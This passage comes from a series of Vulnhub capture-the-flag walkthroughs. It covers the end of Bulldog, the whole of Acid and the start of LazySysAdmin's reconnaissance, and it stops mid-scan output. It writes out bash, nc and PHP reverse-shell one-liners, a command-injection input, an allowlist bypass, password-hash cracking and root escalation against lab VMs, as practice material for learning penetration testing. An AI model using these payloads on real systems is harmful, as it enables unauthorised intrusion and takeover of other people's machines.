src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) Running <code>ls &amp;&amp; bash -i >&amp; /dev/tcp/172.20.10.5/4444 0>&amp;1</code> directly fails; the server returns a 500 error.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) After several bash attempts, echoing the command and piping it into bash finally gives a working reverse shell:</p><p><code>echo "bash -i >&amp; /dev/tcp/172.20.10.5/4444 0>&amp;1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7969' class='md-header-anchor '></a>Privilege Escalation</h2><ul><li>Step 6: List the system users with <code>cat /etc/passwd</code>; the users worth attention are bulldogadmin and django</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 7: Find each user's files (suppressing errors): <code>find / -user bulldogadmin 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><p>(1) Two files stand out: note and customPermissionApp.</p><p>/home/bulldogadmin/.hiddenadmindirectory/note</p><p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p><p>(2) Opening the note text file: it hints that the web server sometimes needs root access.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) customPermissionApp looks like an executable; use strings to print its printable characters:</p><p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' 
referrerPolicy='no-referrer' /></p><p>The note says that running this file grants root, but ls shows the file is only readable, not executable.</p><ul><li>Step 8: Assemble the root password and escalate</li></ul><p>(1) The file contains only a handful of strings that look password-related. The English words are SUPER, ultimate, PASSWORD and youCANTget, all suggestive of the highest-privilege account, so this appears to be a puzzle:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>The most direct combination is to drop the H characters, which leaves a readable English sentence: SUPERultimatePASSWORDyouCANTget</p><p>(2) su cannot be run; it reports: must be run from a terminal. This came up in a previous Vulnhub machine and is solved with one line of Python:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>(3) Run <code>sudo su -</code> to get root and read the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) If the su problem cannot be fixed, remember that SSH is on port 23: log in over SSH with Xshell, then run sudo su - to escalate and get the flag.</p><p>Username: <code>django</code></p><p>Password: <code>SUPERultimatePASSWORDyouCANTget</code>. Instead of the guessed password, django's password can also be changed and then used to log in.</p><p>sudo su escalation, password: <code>SUPERultimatePASSWORDyouCANTget</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8033' class='md-header-anchor '></a>Walkthrough Recap</h2><p>1. Directory brute-forcing reveals the dev and admin pages:</p><p>(1) The dev page can be brute-forced; its source contains several accounts' usernames, e-mail addresses and SHA-1 password hashes. It also links to the webshell command-execution page.</p><p>(2) The admin backend can be brute-forced; its login password comes from cracking the SHA-1 hashes found on the dev page.</p><p>2. Bypassing the allowlist to run commands and get a reverse shell: bypassing the restriction is easy. The bash reverse shell worked after several attempts; a Python shell was not tried.</p><p>3. Searching for files owned by users with UIDs of 1000 and above locates the hidden files.</p><p>4. Guessing the root password is hard.</p><h2><a name='header-n8046' class='md-header-anchor '></a>Lessons Learned</h2><h3><a name='header-n8047' class='md-header-anchor '></a>Difficulties and Pitfalls</h3><p>(1) Finding and cracking the SHA-1 hashes: after spotting several user hashes in the dev page source, they can be submitted straight to cmd5 even without recognising a 40-character SHA-1; the site identifies the type automatically, and two accounts are recovered. Brute-forcing SHA-1 with hashcat would need a strong wordlist and a lot of time.</p><p>(2) There should be several ways to get a reverse shell: the first that came to mind was a bash shell, and a Python reverse shell also came to mind. Only bash was tried; if bash fails, one could echo a script onto the system, give it +x execute permission and run it, or try whether Python can spawn a reverse shell.</p><p>(3) Finding the hidden file with the root password: searching for files owned by UIDs above 1000, checking command history, or listing directories can all find it.</p><p>(4) Guessing the root password: this is the hardest part. Finding the file is not difficult, but reading its contents with strings and splicing them into the root password feels very hard.</p><h1><a name='header-n8056' class='md-header-anchor '></a>Section 4: Acid</h1><pre class="md-fences md-end-block" lang="">Author: 紅日安全
First published on Anquanke (安全客): https://www.anquanke.com/post/id/10546</pre><h2><a name='header-n8058' class='md-header-anchor '></a>Target Information</h2><h3><a name='header-n8059' class='md-header-anchor '></a>Download Link</h3><p><a href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p><h3><a name='header-n8062' class='md-header-anchor '></a>Target Description</h3><p>Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors.</p><h3><a name='header-n8068' class='md-header-anchor '></a>Goal</h3><p>Get root and the flag.</p><h3><a name='header-n8071' class='md-header-anchor '></a>Environment</h3><ul><li>Target: the VM is entirely web-based. Extract the rar and run the vmx in VMware Player; set the network mode to NAT and the target obtains an IP automatically.</li><li>Attacker: a Windows attack box on the same subnet, with Burp Suite, nc, Python 2.7, DirBuster, 御劍 (Yujian) and other penetration-testing tools installed.</li></ul><h2><a name='header-n8082' class='md-header-anchor '></a>Information Gathering</h2><ul><li>IP discovery</li></ul><p>Start the Acid VM. Because the network is in NAT mode, scanning the NAT subnet of the VMware Network Adapter VMnet8 interface with Nmap finds the VM's IP; save the result to a text file:</p><p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><p>Target IP: <code>192.168.64.153</code></p><ul><li>Port scanning</li></ul><p>Scan all ports 1-65535 with nmap, with service fingerprinting, and save the result to a text file:</p><p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>A web service is found on port 33447; the web server is Apache 2.4.10 and the operating system is Ubuntu.</p><p><code>http://192.168.64.153:33447</code> opens the home page:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Service identification</li></ul><p>Only the web service and Apache were found, so the entry point has to be a web or Apache vulnerability (if there is one):</p><p>Port: TCP 33447</p><p>Underlying service: Apache 2.4.10</p><p>Operating system: Ubuntu</p><h2><a name='header-n8124' class='md-header-anchor 
'></a>Detailed Approach to Vulnerability Discovery</h2><ul><li>Web approach:</li></ul><p>(1) View the source of every page and look for hints;</p><p>(2) Brute-force directories with 御劍 (Yujian) or DirBuster, look for new pages, and hunt for vulnerabilities in them;</p><ul><li>Apache approach:</li></ul><p>(1) Check whether Apache 2.4.10 has any known exploitable vulnerability: nothing directly usable was found.</p><p>(2) Search <a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a> for an exploit: none found.</p><p>(3) Run a Nessus host scan: no vulnerabilities found.</p><ul><li>If no vulnerability can be found at all: boot Ubuntu into single-user mode and read the source.</li></ul><ul><li>Step 1: Start with the home page source, which contains the hint: 0x643239334c6d70775a773d3d</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>The 0x prefix denotes hexadecimal. Decoding 643239334c6d70775a773d3d from ASCII hex gives: d293LmpwZw==</p><p>This is base64; decoding it gives an image name, wow.jpg</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>From experience, the usual image directories can be tried directly under the site root: /image/wow.jpg, /images/wow.jpg or /icon/wow.jpg, since that is how image directories are commonly named. Alternatively, directory brute-forcing with DirBuster reveals the images directory.</p><ul><li>Visiting <code>http://192.168.64.153:33447/images/wow.jpg</code> returns the image:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Save the image locally and open it in Notepad++; there is a hint at the very end</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><p>Decoding 3761656530663664353838656439393035656533376631366137633631306434 from ASCII hex gives 7aee0f6d588ed9905ee37f16a7c610d4, which is an MD5 hash.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>Looking it up on cmd5 gives 63425, presumably a password or an ID.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 2: Brute-force directories with DirBuster:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' 
referrerPolicy='no-referrer' /></p><p>The results show a challenge directory containing cake.php, include.php and hacked.php. With Burp Suite set up as a proxy, visit the three files in turn from Firefox:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 3: Visiting cake.php shows that it requires login:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><p>Looking at the page title, or at <code>&lt;title&gt;/Magic_Box&lt;/title&gt;</code> in the Burp Suite response, reveals that a /Magic_Box directory exists; look at the other pages first.</p><p>Clicking login redirects to the index.php login page, which requires an e-mail address and a password:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 4: include.php is a file-inclusion page:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>Entering /etc/passwd in the input box confirms the file inclusion; the response shown in Burp Suite is:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>The aim is a shell via file inclusion, but there is no upload point, and the wow.jpg found earlier contains no webshell to include. Continue with hacked.php first.</p><ul><li>Step 5: cake.php asks for an ID; try the number decoded from wow.jpg earlier: 63425</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><p>Nothing happens, so either the ID is wrong or a login with e-mail and password on the index page is required first.</p><ul><li>Step 6: Hunting for injection: all the pages found were scanned with AWVS; no injection was found.</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 7: Brute-forcing the Magic_Box directory found earlier reveals low.php and command.php</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 8: low.php is an empty page; command.php is a command-execution interface:</li></ul><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>System commands can be executed: entering 192.168.64.1;id and checking the response in Burp Suite shows that the id command ran successfully.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8247' class='md-header-anchor '></a>Getting a Shell</h2><ul><li>Step 9: Reverse shell via PHP. Start nc on Windows listening on port 4444:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>To avoid escaping and truncation, the payload entered in GET or POST requests must be URL-encoded. The bash and nc reverse shells below both failed:</p><p><code>bash -i >&amp; /dev/tcp/192.168.64.1/4444 0>&amp;1</code></p><p><code>nc -e /bin/bash -d 192.168.64.1 4444</code></p><p>A PHP reverse shell succeeded; URL-encode the payload below and send it from Burp:</p><p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i &lt;&amp;3 >&amp;3 2>&amp;3");'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>However, su cannot be run; it echoes su: must be run from a terminal, so a terminal is needed. I could not think of a way round it and eventually found the answer on Google: use Python to spawn a local shell:</p><p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p><p><code>python /tmp/asdf.py</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p>su now works:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8282' class='md-header-anchor '></a>Privilege Escalation</h2><ul><li>Step 10: List the users with <code>cat /etc/passwd</code>; the users worth attention are acid, saman and root</li></ul><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 11: Find each user's files (suppressing errors): <code>find / -user acid 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p><p>This reveals /sbin/raw_vs_isi/hint.pcapng, a network capture file. Copy it to Kali and open it in Wireshark:</p><p><code>scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p><p>Looking only at the TCP packets reveals saman's password: 1337hax0r</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 12: su to saman and then to root to get the flag</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p><p>Then use sudo -i to escalate to root (the password is again 1337hax0r) and read flag.txt in the root directory.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8316' class='md-header-anchor '></a>Walkthrough Recap</h2><p>The author's design can be compared with a walkthrough published abroad: <code>http://resources.infosecinstitute.com/acid-server-ctf-walkthrough</code>. The main breakthroughs are:</p><p>1. Two rounds of directory brute-forcing: the first finds the challenge directory with cake.php, include.php and hacked.php; the second, on the Magic_Box directory, finds command.php.</p><p>2. After finding the command-execution interface, use a PHP reverse shell; the payload must be URL-encoded when sent over HTTP.</p><p>3. su escalation needs a terminal; with no prior experience, Google had to solve it.</p><p>4. Escalation works by searching known users' files and finding the password; no exploit or msf was used.</p><h2><a name='header-n8329' class='md-header-anchor '></a>Lessons Learned</h2><h3><a name='header-n8333' class='md-header-anchor '></a>Key Takeaways</h3><ol start='' ><li>A command-execution vulnerability can be turned into a PHP reverse shell; previously only bash or nc had been used.</li><li>su escalation needs a terminal; Python solves it.</li><li>After getting a shell, search each user's files thoroughly; there may be new findings.</li></ol><h3><a name='header-n8344' class='md-header-anchor '></a>Pitfalls</h3><ol start='' 
><li>File inclusion vulnerability: no way to exploit it was found, and with no upload point it could not be used to get a shell;</li><li>su escalation needs a terminal; with no prior knowledge or experience, it was solved with expert guidance and Google searches.</li><li>The way the e-mail username and password are obtained from the index.php page is very obscure; without the foreign tutorial I would not have thought of it.</li><li>Brute-force every directory you find. The default 御劍 (Yujian) wordlist was not enough; only the OWASP wordlist worked. Directory brute-forcing bypassed the e-mail login above and led straight through to the command-execution page.</li></ol><p>In short, without Google and other people's guidance I could not have completed this on my own; I need to broaden my thinking and practise more.</p><h1><a name='header-n8362' class='md-header-anchor '></a>Section 5: LazySysAdmin: 1</h1><h2><a name='header-n8364' class='md-header-anchor '></a>Target Information</h2><h3><a name='header-n8365' class='md-header-anchor '></a>Download Link</h3><p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p><h3><a name='header-n8368' class='md-header-anchor '></a>Environment</h3><ul><li>VirtualBox (either one of the two)</li><li>VMware Workstation Player</li></ul><h3><a name='header-n8376' class='md-header-anchor '></a>Hints</h3><ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul><h2><a name='header-n8390' class='md-header-anchor '></a>Information Gathering</h2><h3><a name='header-n8391' class='md-header-anchor '></a>IP Discovery</h3><p>netdiscover can be used to discover hosts on the local network.</p><p>netdiscover -i wlo1</p><pre class="md-fences md-end-block" lang="bash">➜ evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16 | Screen View: Unique Hosts

 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 42
 _____________________________________________________________________________
 IP At MAC Address Count Len MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH
</pre><h3><a name='header-n8397' class='md-header-anchor '></a>Port Scanning</h3><p>Scan with masscan</p><p>masscan 192.168.0.100 -p 1-10000 --rate=1000</p><pre class="md-fences md-end-block" lang="bash">➜ evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
</pre><p>Scan with nmap</p><p>nmap -T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; 
top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜ evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span> </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">PORT STATE SERVICE VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp open <span class="cm-builtin">ssh</span> OpenSSH <span 
class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp open http Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span 
class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp open netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp open netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open mysql MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open irc InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| server: Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">| servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span 
class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" 